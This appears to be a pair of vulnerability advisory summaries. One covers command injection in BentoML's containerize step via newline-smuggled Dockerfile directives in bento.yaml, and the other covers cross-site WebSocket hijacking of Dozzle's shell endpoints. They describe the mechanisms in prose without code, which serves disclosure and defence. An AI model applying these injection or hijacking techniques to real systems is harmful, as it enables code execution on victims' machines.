Command injection in BentoML allows arbitrary code execution on developer workstations during containerization of untrusted bento packages. Attackers craft malicious bento.yaml files with newline-injected docker.base_image values that smuggle Dockerfile RUN directives into the generated Dockerfile template. When victims run 'bentoml containerize' on the malicious bento, Docker build executes the injected commands on the host system with full developer privileges. This vulnerability (GHSA-78f9-r8mh-4xm2) is part of a documented cluster alongside GHSA-w2pm-x38x-jp44, CVE-2026-33744, and CVE-2026-35043, all involving unsafe Jinja2 template interpolation in BentoML's Dockerfile generation pipeline. Fixed in version 1.4.39. No active exploitation confirmed at time of analysis; EPSS data not available for 2026-dated CVE.
Cross-Site WebSocket Hijacking (CSWSH) in Dozzle's /exec and /attach endpoints allows authenticated shell access bypass when --enable-shell is enabled. The vulnerability stems from WebSocket origin validation bypass (CheckOrigin returns true) combined with SameSite=Lax JWT cookies, enabling attackers on same-site origins (sibling subdomains or localhost services) to hijack victim WebSocket sessions and execute arbitrary commands in Docker containers. Affects all Dozzle deployments through version 10.5.1 with shell access enabled. No public exploit identified at time of analysis, but detailed proof-of-concept exists in the GitHub advisory demonstrating container shell access via Python script. CVSS score not assigned, but CWE-346 classification indicates origin validation failure.